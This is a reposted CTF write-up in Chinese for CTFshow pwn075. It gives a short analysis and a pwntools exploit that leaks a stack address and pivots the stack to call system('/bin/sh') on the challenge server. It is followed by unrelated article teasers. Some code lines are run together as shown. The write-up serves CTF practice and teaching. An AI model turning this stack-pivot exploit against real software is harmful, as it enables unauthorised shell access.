CTFshow pwn075

news/2024/11/18 10:50:23/文章来源:https://www.cnblogs.com/IconC/p/18199405

CTFshow pwn075

题目描述:栈空间不够怎么办?

首先检查保护:

image-20240518154553707

32位开启NX保护,部分开启RELRO,放入ida中看

image-20240518154852784

image-20240518154914940

有两次输入点,输入只能到返回地址,所以考虑用到栈迁移

exp:

from pwn import *p = remote("pwn.challenge.ctf.show",28276)
elf = ELF("./pwn75")
#p = process([elf.path])
#libc = ELF("./libc.so.6")
context(arch=elf.arch, os=elf.os)
context.log_level = 'debug'
leave=0x08048766
payload='a'*0x28
p.recvuntil('codename:')
p.send(payload)
buf=u32(p.recvuntil('\xff')[-4:])-0x38
info("bufaddr:"+hex(buf))
payload = (p32(elf.plt['system']) + 'aaaa' + p32(buf + 12) + '/bin/sh\x00').ljust(0x28,'a')+p32(buf-4) +p32(leave)p.send(payload)
#gdb.attach(p)
p.interactive()

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/708258.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

提取字符串中间的字母数字

提取字符串中间的字母数字

问题:字符串包含汉字、字母、数字、符号等,需要提取汉字后连续9个字母数字符号 函数公式解决:老套路: =LEFT(MIDB(A2,SEARCHB("?",A2),99),9) WPS专用新套路: =@REGEXP(A2,"[--Z]+")老套路: SearchB:查找第一个单字节字符的位置 MidB:中取汉字后所…
阅读更多...
曼哈顿距离与切比雪夫距离

曼哈顿距离与切比雪夫距离

曼哈顿距离与切比雪夫距离 距离 - OI Wiki (oi-wiki.org)已经说的比较清晰,提取要点和结论便于复习使用。 曼哈顿距离:\(d \left(\right. A , B \left.\right) = \left|\right. x_{1} - x_{2} \left|\right. + \left|\right. y_{1} - y_{2} \left|\right.\) 切比雪夫距离:\(…
阅读更多...
primethus

primethus

监控介绍 监控数据流程介绍监控优势 如果监控的是物理机,则用 Zabbix,Zabbix 在传统监控系统中,尤其是在服务器相关监控方面,占据绝对优势。甚至环境变动不会很频繁的情况下,Zabbix 也会比 Pometheus好使。但如果是云环境的话,除非是Zabbix玩的非常溜,可以做各种定制,否…
阅读更多...
embedding

embedding

1 one-hot编码 首先讲讲one-hot编码,这种编码很简单。假设你有N个词,那么就直接创建一个N维度的向量,之后每个词在不同位置上取1来区分。N个词相当于在一个N维空间里,刚好N个单位向量。而且这些向量彼此正交 这种简单的表示方法存在几个问题:维度高:N个词有N个维度,所以…
阅读更多...
美团一面问我i++跟++i的区别是什么

美团一面问我i++跟++i的区别是什么

美团一面问我i++跟++i的区别是什么 面试官:“i++跟++i的区别是什么?” 我:“i++是先使用然后再执行+1的操作,++i是先执行+1的操作然后再去使用i” 面试官:“那你看看下面这段代码,运行结果是什么?” public static void main(String[] args) {int j = 0;for (int i = 0;…
阅读更多...
成功实现FaceTime数据筛选,FaceTime蓝号检测,检测是否开通FaceTime功能的实现原理

成功实现FaceTime数据筛选,FaceTime蓝号检测,检测是否开通FaceTime功能的实现原理

FaceTime是苹果公司iOS和macOS(以前称Mac OS X或OS X)内置的一款视频通话软件,通过Wi-Fi或者蜂窝数据接入互联网,在两个装有FaceTime的设备之间实现视频通话。其要求通话双方均具有装有FaceTime的苹果设备,苹果ID以及可接入互联网的3G/4G/5G或者Wi-Fi网络。一、Windows电脑…
阅读更多...
一文掌握:数据湖是什么?可不是数据仓库

一文掌握:数据湖是什么?可不是数据仓库

一、什么是数据湖 数据湖(Data Lake)是指一个大型数据存储和处理系统,它能够存储各种类型和格式的数据,包括结构化数据、半结构化数据和非结构化数据。数据湖的目的是为了让企业可以更好地管理和利用大量的数据,以便进行数据分析、机器学习等工作。数据湖通常采用分布式计…
阅读更多...
Django markdown 实现

Django markdown 实现

一、安装markdown插件 pip install django-mdeditor pip install markdown二、在 settings 配置文件 INSTALLED_APPS 中添加 mdeditor:INSTALLED_APPS = [...mdeditor,]三、插入图片没有地址,针对django3.0+修改 frame 配置,settings.py设置如下: X_FRAME_OPTIONS = SAMEORI…
阅读更多...
一款基于C#开发的通讯调试工具(支持Modbus RTU、MQTT调试)

一款基于C#开发的通讯调试工具(支持Modbus RTU、MQTT调试)

前言 今天大姚给大家分享一款基于C#、WPF、Prism、MaterialDesign、HandyControl开发的通讯调试工具(支持Modbus RTU、MQTT调试,界面色彩丰富):Wu.CommTool。 工具特点工具界面色彩丰富。 支持Modbus RTU、MQTT服务器、MQTT客户端。 Modbus RTU自动解析数据帧。 智能防粘包…
阅读更多...
C++学习----数据类型

C++学习----数据类型

阅读更多...
20240518模拟赛

20240518模拟赛

C240518A. 传送门(portal) 构造一个图使得点\(1\)到\(2\)的最短路正好有\(k\)条,使构造出的图点的个数\(N\le n_5\) 考虑\(k=2^t\)那么可以轻松构造出如下的图对于其他的情况可以考虑二进制拆分,如\(k=10\)时为了,使最短路长度固定加入点\(9\)对\(k=10^9\),只需构造\(80\)个…
阅读更多...
『手撕Vue-CLI』添加帮助和版本号

『手撕Vue-CLI』添加帮助和版本号

前言 经过上一篇『手撕Vue-CLI』编码规范检查之后,手撕 Vue-CLI 已经进阶到了代码规范检查这一步,已经将基本的工程搭建好了,然后代码规范约束也已经加入了,并且将 nue-cli 指令绑定到了全局当中,可以在任何地方使用了。 正文 接下来这篇文章呢,就要来实现一下大多数的命…
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023